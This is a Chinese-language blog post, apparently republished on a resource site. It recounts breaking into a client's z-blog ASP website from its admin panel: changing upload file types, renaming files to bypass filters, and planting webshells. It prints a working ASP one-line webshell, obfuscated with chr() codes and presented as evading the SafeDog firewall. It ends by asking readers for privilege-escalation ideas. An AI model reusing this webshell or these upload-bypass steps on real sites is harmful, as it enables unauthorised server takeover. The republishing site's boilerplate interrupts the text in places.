一次似白不白,似黑不黑的网站入侵渗透检测 -电脑资料

电脑资料 时间:2019-01-01 我要投稿
【www.unjs.com - 电脑资料】

   

    [ 目录 ]

    0×00 事件起因

    0×01 经过

    0×02 总结

    0×00 事件起因

    我们公司客户的网站,

一次似白不白,似黑不黑的网站入侵渗透检测

。有了后台帐号密码,admin权限,z-blog asp的程序,我就下载了看了z-blog php 研究了一下后台拿SHELL,发现这个程序后台拿SHELL好简单。

    1)    方法一:全局设置—更改上传文件类型—附件上传

    2)    方法二:

    主题修改;php版

   

    Asp版不一样,我百度了一下,我去发现一大把

   

   

    0×01经过

    后台上传;一句话:直接更改.log后缀

   

   

    上传过狗一句话绕过成功

    附上过狗一句话:

    “<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("a"))%>”

    到一上传大马的时候,也遇见了上传一句话同样的问题!

    Asp包含上传通过,

电脑资料

一次似白不白,似黑不黑的网站入侵渗透检测》(https://www.unjs.com)。 text.txt大马

    起先一直没有搞定。朋友一起甩我一个过狗大马直接秒杀!

    0×02 总结

    发现各种过狗大马的大牛就是吊,鸣谢小乐天大牛指导!最后附上过狗大马截图,求提权思路

   

    虽然服务有后门,远程连接不上!3389打开的,应该是被什么东西阻挡了!

最新文章